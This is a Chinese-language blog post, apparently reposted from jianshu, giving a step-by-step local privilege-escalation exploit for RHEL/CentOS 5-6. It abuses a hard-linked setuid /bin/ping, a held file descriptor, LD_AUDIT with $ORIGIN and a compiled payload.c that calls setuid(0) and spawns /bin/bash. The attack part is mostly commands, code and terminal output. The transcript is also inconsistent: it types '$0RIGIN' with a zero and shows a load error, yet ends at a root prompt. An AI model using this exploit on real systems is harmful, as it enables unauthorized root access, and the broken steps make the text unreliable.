来源:https://www.jianshu.com/p/595b4ac76467

作者:星期四晚八点

————————————————————————————————————————————————————

一:前言

提权就是让普通用户用户超级用户的权限。本次试验漏洞适用于RHEL 5-6和CentOS 5-6系列所有版本

主要利用/tmp/目录和/bin/ping 命令进行的权限漏洞进行提权

二:准备工作

centos6.8下载地址:http://archive.kernel.org/centos-vault/6.8/isos/x86_64/CentOS-6.8-x86_64-LiveDVD.iso

三:提权过程

[root@PC1 ~]# useradd mk  
[root@PC1 ~]# su mk  
[mk@PC1 /]$ ll -d /tmp/  
drwxrwxrwt. 3 root root 4096 7?. 11 03:54 /tmp/  
[mk@PC1 /]$ cd /tmp/
[mk@PC1 tmp]$ mkdir exploit  
[mk@PC1 tmp]$ ll -d /bin/ping  
-rwsr-xr-x. 2 root root 40760 9?. 26 2013 /bin/ping  
[mk@PC1 tmp]$ ln -s /bin/ping /tmp/exploit/target  
[mk@PC1 tmp]$ ll !$  
ll /tmp/exploit/target  
-rwsr-xr-x. 3 root root 40760 9?. 26 2013 /tmp/exploit/target
[mk@PC1 tmp]$ exec 3< /tmp/exploit/target  
[mk@PC1 tmp]$ ll /proc/$$/fd/3  
lr-x------. 1 mk mk 64 7?. 11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target  
[mk@PC1 tmp]$ ll /tmp/exploit  
总用量 40  
-rwsr-xr-x. 3 root root 40760 9月  26 2013 target  
[mk@PC1 tmp]$ rm -rf /tmp/exploit/  
[mk@PC1 tmp]$ ll /proc/$$/fd/3  
lr-x------. 1 mk mk 64 7月  11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target (deleted)  
[mk@PC1 tmp]$ vim payload.c
void __attribute__((constructor)) init()   //__这是两个下划线
{
        setuid(0);
        system("/bin/bash");
}
[mk@PC1 tmp]$ yum -y install gcc
Loaded plugins: fastestmirror, security
You need to be root to perform this command.
[mk@PC1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[mk@PC1 tmp]$ ll /tmp/exploit
-rwxrwxr-x. 1 mk mk 6020 7月  11 07:29 /tmp/exploit
[mk@PC1 tmp]$ LD_AUDIT="\$0RIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$0RIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@PC1 ~]# 

四:总结

虽然这样的漏洞利用条件我们不一定遇得到,但是要知道有这样一种利用方式。

 

Logo

更多推荐